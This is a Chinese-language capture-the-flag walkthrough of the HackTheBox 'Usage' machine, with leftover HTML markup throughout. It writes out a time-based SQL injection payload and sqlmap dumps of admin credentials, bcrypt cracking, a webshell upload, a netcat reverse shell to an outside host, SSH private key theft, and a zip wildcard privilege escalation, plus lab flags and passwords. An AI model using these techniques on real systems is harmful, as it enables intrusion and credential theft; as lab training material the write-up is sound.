HTB靶机Usage渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行初始扫描：<\/p>
nmap -sV -sC 10.10.11.18 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>1.2 主机文件配置<\/h3>
将目标主机添加到\/etc\/hosts文件中：<\/p>
echo '10.10.11.18 usage.htb admin.usage.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. Web应用测试<\/h2>
2.1 发现SQL注入漏洞<\/h3>
在\/forget-password<\/code>页面发现SQL注入点：<\/p>
email=maptnh%40log.com'+AND+5212%3dBENCHMARK(5000000,MD5(0x62434473))--+NKGG
<\/code><\/pre>
2.2 使用SQLMap进行自动化注入<\/h3>

确认注入点：<\/li>
<\/ol>
sqlmap -r request.txt --level 5<\/span> --risk 3<\/span> -p email --batch
<\/span><\/span><\/code><\/pre>
枚举数据库：<\/li>
<\/ol>
sqlmap -r request.txt --level 5<\/span> --risk 3<\/span> -p email --batch --dbs --threads 10<\/span>
<\/span><\/span><\/code><\/pre>
选择目标数据库：<\/li>
<\/ol>
sqlmap -r request.txt --level 5<\/span> --risk 3<\/span> -p email --batch -D usage_blog --threads 10<\/span>
<\/span><\/span><\/code><\/pre>
提取管理员凭据：<\/li>
<\/ol>
sqlmap -r request.txt --level 5<\/span> --risk 3<\/span> -p email --batch -D usage_blog -T admin_users -C username,password --dump --threads 10<\/span>
<\/span><\/span><\/code><\/pre>获取到哈希值：$2y$10$ohq2kLpBH\/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2<\/code><\/p>
2.3 破解哈希<\/h3>

保存哈希到文件：<\/li>
<\/ol>
echo "<\/span>$2y<\/span>$10$ohq2kLpBH\/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2"<\/span>>hash
<\/span><\/span><\/code><\/pre>
使用John破解：<\/li>
<\/ol>
john hash --show
<\/span><\/span><\/code><\/pre>获取到明文密码：whatever1<\/code><\/p>
3. 获取初始访问权限<\/h2>
3.1 登录后台<\/h3>
使用获取的凭据登录：<\/p>
URL: http:\/\/admin.usage.htb
用户名: admin
密码: whatever1
<\/code><\/pre>
3.2 利用CVE-2023-24249任意文件上传漏洞<\/h3>

在修改头像处抓包上传webshell<\/li>
Webshell内容为完整的PHP反向shell代码<\/li>
<\/ol>
3.3 访问上传的Webshell<\/h3>
Webshell路径：<\/p>
http:\/\/admin.usage.htb\/uploads\/images\/1.jpg.php
<\/code><\/pre>
3.4 建立反向Shell<\/h3>
由于上传的文件会自动删除，建议建立反向shell：<\/p>
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.10.14.25 10032<\/span> >\/tmp\/f
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 获取User Flag<\/h3>
cd ~
<\/span><\/span>cat user.txt
<\/span><\/span><\/code><\/pre>User Flag: c2d7e977f5bf1e5489600557a46274af<\/code><\/p>
4.2 发现其他用户<\/h3>

查看.ssh目录：<\/li>
<\/ol>
ls -la
<\/span><\/span><\/code><\/pre>
获取SSH私钥：<\/li>
<\/ol>
cat .ssh\/id_rsa
<\/span><\/span><\/code><\/pre>
使用私钥登录：<\/li>
<\/ol>
chmod 400<\/span> id_rsa
<\/span><\/span>ssh -i id_rsa dash@10.10.11.18
<\/span><\/span><\/code><\/pre>
检查系统用户：<\/li>
<\/ol>
cat \/etc\/passwd
<\/span><\/span><\/code><\/pre>发现xander用户<\/p>
4.3 获取xander用户凭据<\/h3>
在.monitrc文件中找到xander用户的密码：<\/p>
cat .monitrc
<\/span><\/span><\/code><\/pre>密码: `3nc0d3d_pa<\/p>
\[w0rd`

### 4.4 登录xander用户

```bash
ssh xander@10.10.11.18
```

### 4.5 检查sudo权限

```bash
sudo -l
```
发现可以以root权限运行`\/usr\/bin\/usage_management`

### 4.6 分析usage_management程序

```bash
strings \/usr\/bin\/usage_management
```
发现程序使用zip进行压缩，并使用了通配符*

### 4.7 利用zip特性提权

1. 创建特殊文件：
```bash
cd \/var\/www\/html\/
touch '@root.txt'
```

2. 创建软链接：
```bash
ln -s -r \/root\/root.txt root.txt
```

3. 执行特权程序：
```bash
sudo \/usr\/bin\/usage_management
```
选择第一个选项

### 4.8 获取Root Flag

程序执行后，可以读取root.txt内容：
```bash
cat root.txt
```
Root Flag: `4db7d21fd012953e657d461c1c6c0900`

## 5. 技术要点总结

1. **SQL注入利用**：通过忘记密码功能发现SQL注入点，使用SQLMap自动化提取数据库信息

2. **哈希破解**：识别哈希类型为bcrypt，使用John the Ripper进行破解

3. **文件上传漏洞**：利用已知CVE漏洞上传webshell获取初始访问权限

4. **权限提升路径**：
   - 通过SSH私钥横向移动到dash用户
   - 在配置文件中发现xander用户凭据
   - 利用sudo权限执行usage_management程序
   - 利用zip的-snl参数特性读取root文件

5. **关键命令**：
   - 反向shell构造
   - 软链接创建
   - sudo权限检查
   - 字符串分析\]<\/span><\/p>